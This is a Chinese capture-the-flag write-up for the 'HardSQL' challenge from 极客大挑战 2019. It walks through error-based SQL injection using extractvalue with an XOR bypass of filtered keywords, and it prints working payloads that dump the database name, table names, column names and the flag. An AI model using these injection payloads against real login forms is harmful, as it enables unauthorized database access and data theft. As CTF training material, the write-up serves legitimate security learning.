[极客大挑战 2019]HardSQL1

拿到题目,好多类似的,这次估计更难,sql注入漏洞

随便注入一个

估计是被过滤了

2.1我们先去爆数据库:先构造payload:

复制代码
?username=admin&password=admin'^extractvalue(1,concat(0x5c,(select(database()))))%23

爆表名

复制代码
?username=admin&password=admin'^extractvalue(1,concat(0x5c,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like('geek'))))%23

爆列名

复制代码
?username=admin&password=admin'^extractvalue(1,concat(0x5c,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1'))))%23

flag出来了,但是只有一半,使用right和left

复制代码
/check.php?username=admin&password=admin%27^extractvalue(1,concat(0x7e,(select(left(password,30))from(geek.H4rDsq1))))%23

/check.php?username=admin&password=admin%27^extractvalue(1,concat(0x7e,(select(right(password,30))from(geek.H4rDsq1))))%23

得到flag

相关推荐
GZ_TOGOGO3 小时前
网络安全认证考取证书有哪些?
安全·web安全·网络安全·cisp
飞行增长手记4 小时前
IP协议从跨境到物联网的场景化应用
服务器·前端·网络·安全
瀚高PG实验室4 小时前
如何将HGDB安全版(RPM包形式)安装在非root用户下
服务器·网络·安全·瀚高数据库
三七吃山漆5 小时前
Morse Decoder
安全·misc
it运维技术圈5 小时前
印度电信部门发布强制指令:即时通讯应用需绑定活跃 SIM 卡,实施六小时会话登出
网络·安全·web安全
得物技术6 小时前
得物个人信息保护社会责任报告
安全
Xudde.6 小时前
friendly靶机渗透
笔记·学习·安全·web安全·php
timeweaver6 小时前
React Server Components 的致命漏洞CVE-2025-55182
前端·安全
骥龙7 小时前
5.15、未来已来:AI安全的发展趋势与伦理思考
人工智能·安全